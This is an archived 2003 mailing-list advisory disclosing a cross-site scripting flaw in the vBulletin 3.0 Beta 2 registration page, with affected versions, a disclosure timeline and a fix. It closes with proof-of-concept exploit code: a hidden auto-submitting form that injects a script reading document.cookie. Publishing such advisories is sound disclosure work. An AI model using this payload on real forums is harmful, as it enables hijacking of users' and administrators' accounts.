OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
[VulnWatch] VBulletin New Member XSS Vulnerability

From: Ferruh Mavituna (ferruhmavituna.com)
Date: Fri Aug 08 2003 - 09:53:53 CDT


------------------------------------------------------
VBulletin New Member XSS Vulnerability
------------------------------------------------------
Any kind of XSS attacks possibility. With this vuln. an attacker could
access other users/admins accounts.
Online URL : http://ferruh.mavituna.com/article.asp?256

------------------------------------------------------
About VBulletin;
------------------------------------------------------
PHP Based Popular Forum Application

Vendor & Demo;
www.vbulletin.com

------------------------------------------------------
Description;
------------------------------------------------------
In new member page (register.php), If you skip a required field system
redirect you same form and fill fields automaticly that you enter before for
a better form. In standard fields Vbulletin successfully handle script
injections. But in optional fields like "Interests-Hobbies", "Biography",
"Occupation" etc...

So you can execute any JS with this fields.

------------------------------------------------------
Vulnerable;
------------------------------------------------------
vBulletin 3.0 Beta 2

------------------------------------------------------
Non Vulnerable;
------------------------------------------------------
vBulletin 2.3.0
vBulletin 2.2.8 ...

------------------------------------------------------
Vendor Status;
------------------------------------------------------
No answer at the moment.

------------------------------------------------------
History
------------------------------------------------------
Discovered : 15.07.2003
Vendor Informed : 29.07.2003
Publihed : 06.08.2003

------------------------------------------------------
Solution;
------------------------------------------------------
HTML Encoding like other inputs is OK.

------------------------------------------------------
Exploit Code;
------------------------------------------------------
[form action="http://[victim]/register.php?do=register" method="post"
style="display:none"]
 [input type="hidden" name="s" value="" /]
 [input type="hidden" name="regtype" value="1" /]
 [input type="text" class="bginput" name="field1" value="" size="25"
maxlength="250" /]
 [input type="hidden" name="url" value="index.php" /]
 [input type="hidden" name="do" value="addmember" /]
[/form]
[script]
 //Code that will be executed
 var xss = "\"][script]alert(document"+".cookie)[\/script]";
 document.forms[0].field1.value=xss;
 document.forms[0].submit();
[/script]

*Replace ([],<>)

Ferruh Mavituna
ferruhmavituna.com
http://ferruh.mavituna.com
Web Application Security Specialist